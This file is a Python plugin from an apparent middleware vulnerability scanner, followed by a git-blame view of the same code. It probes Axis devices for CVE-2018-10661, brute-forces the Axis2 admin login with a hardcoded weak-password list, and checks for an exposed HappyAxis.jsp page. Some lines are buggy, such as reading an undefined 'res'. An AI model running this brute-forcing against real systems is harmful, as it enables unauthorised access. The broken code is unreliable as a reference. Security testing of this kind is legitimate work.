N-MiddlewareScan/old_plugins/axis.py

#coding=utf-8
import requests
from user_agent import get_user_agent
def CVE_2018_10661(url):
    try:
        headers = {'User-Agent': get_user_agent()}
        data = {"action": "abc", "return_page": "it_worked"}
        url = url.rstrip("/") + "/index.html/a.srv"
        s = requests.post(url=url, data=data, headers=headers)
        if "it_worked" in s.text:
            return "exist CVE_2018_10661"
        else:
            return "not exist CVE_2018_10661"
    except Exception:
        return "not exist CVE_2018_10661"
def axis_admin(host):
    try:
        url = "http://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        error_i = 0
        flag_list = ['Administration Page</title>', 'System Components', 'axis2-admin/upload',
                     'include page="footer.inc">', 'axis2-admin/logout']
        user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root']
        pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',
                     'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
                try:
                    login_url = url + '/axis2/axis2-admin/login'
                    PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password)
                    request = requests.post(url=login_url, data=PostStr, headers=headers)
                    res_html = res.text
                except Exception:
                    return 'axis_plugin_catalog no weak password。'
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s Axis Weak password %s:%s' % (login_url, user, password)
                        return 'YES|' + info
        return 'axis_plugin_catalog no weak password。'
    except Exception:
        return 'axis_plugin_catalog no weak password。'

def axis_info(host):
    try:
        url = "http://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        vul_url = url + "/axis2/axis2-web/HappyAxis.jsp"
        try:
            s = requests.get(url=url, headers=headers)
            res_html = s.text
        except Exception:
            return 'no axis_plugin_catalog info。'
        if "Axis2 Happiness Page" in res_html:
            info = vul_url + " Axis Information Disclosure"
            return 'YES|' + info
        return 'no axis_plugin_catalog info。'
    except Exception:
        return 'no axis_plugin_catalog info。'
def axis(url):
    cve__2018_10661=CVE_2018_10661(url)
    print(cve__2018_10661)
    axis_admins=axis_admin(url)
    print(axis_admins)
    axis_infos=axis_info(url)
    print(axis_infos)
主体 2019-03-27 16:21:50 +08:00			`#coding=utf-8`
axis 2019-03-27 20:21:25 +08:00			`import requests`
主体 2019-03-27 16:21:50 +08:00			`from user_agent import get_user_agent`
			`def CVE_2018_10661(url):`
glassfish 2019-03-27 23:53:55 +08:00			`try:`
			`headers = {'User-Agent': get_user_agent()}`
			`data = {"action": "abc", "return_page": "it_worked"}`
			`url = url.rstrip("/") + "/index.html/a.srv"`
			`s = requests.post(url=url, data=data, headers=headers)`
			`if "it_worked" in s.text:`
			`return "exist CVE_2018_10661"`
			`else:`
			`return "not exist CVE_2018_10661"`
			`except Exception:`
axis 2019-03-27 20:21:25 +08:00			`return "not exist CVE_2018_10661"`
			`def axis_admin(host):`
glassfish 2019-03-27 23:53:55 +08:00			`try:`
			`url = "http://%s" % (host)`
			`headers = {'User-Agent': get_user_agent()}`
			`error_i = 0`
new plugin 2019-03-28 23:56:13 +08:00			`flag_list = ['Administration Page</title>', 'System Components', 'axis2-admin/upload',`
glassfish 2019-03-27 23:53:55 +08:00			`'include page="footer.inc">', 'axis2-admin/logout']`
complete 2019-03-30 23:03:09 +08:00			`user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root']`
			`pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',`
glassfish 2019-03-27 23:53:55 +08:00			`'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root']`
			`for user in user_list:`
			`for password in pass_list:`
			`try:`
			`login_url = url + '/axis2/axis2-admin/login'`
			`PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password)`
			`request = requests.post(url=login_url, data=PostStr, headers=headers)`
			`res_html = res.text`
			`except Exception:`
complete 2019-03-30 23:03:09 +08:00			`return 'axis_plugin_catalog no weak password。'`
glassfish 2019-03-27 23:53:55 +08:00			`for flag in flag_list:`
			`if flag in res_html:`
			`info = '%s Axis Weak password %s:%s' % (login_url, user, password)`
			`return 'YES\|' + info`
complete 2019-03-30 23:03:09 +08:00			`return 'axis_plugin_catalog no weak password。'`
glassfish 2019-03-27 23:53:55 +08:00			`except Exception:`
complete 2019-03-30 23:03:09 +08:00			`return 'axis_plugin_catalog no weak password。'`
axis 2019-03-27 20:21:25 +08:00
			`def axis_info(host):`
			`try:`
glassfish 2019-03-27 23:53:55 +08:00			`url = "http://%s" % (host)`
			`headers = {'User-Agent': get_user_agent()}`
			`vul_url = url + "/axis2/axis2-web/HappyAxis.jsp"`
			`try:`
			`s = requests.get(url=url, headers=headers)`
			`res_html = s.text`
			`except Exception:`
complete 2019-03-30 23:03:09 +08:00			`return 'no axis_plugin_catalog info。'`
glassfish 2019-03-27 23:53:55 +08:00			`if "Axis2 Happiness Page" in res_html:`
			`info = vul_url + " Axis Information Disclosure"`
			`return 'YES\|' + info`
complete 2019-03-30 23:03:09 +08:00			`return 'no axis_plugin_catalog info。'`
axis 2019-03-27 20:21:25 +08:00			`except Exception:`
complete 2019-03-30 23:03:09 +08:00			`return 'no axis_plugin_catalog info。'`
主体 2019-03-27 16:21:50 +08:00			`def axis(url):`
axis 2019-03-27 20:21:25 +08:00			`cve__2018_10661=CVE_2018_10661(url)`
			`print(cve__2018_10661)`
			`axis_admins=axis_admin(url)`
			`print(axis_admins)`
			`axis_infos=axis_info(url)`
			`print(axis_infos)`

主体 2019-03-27 16:21:50 +08:00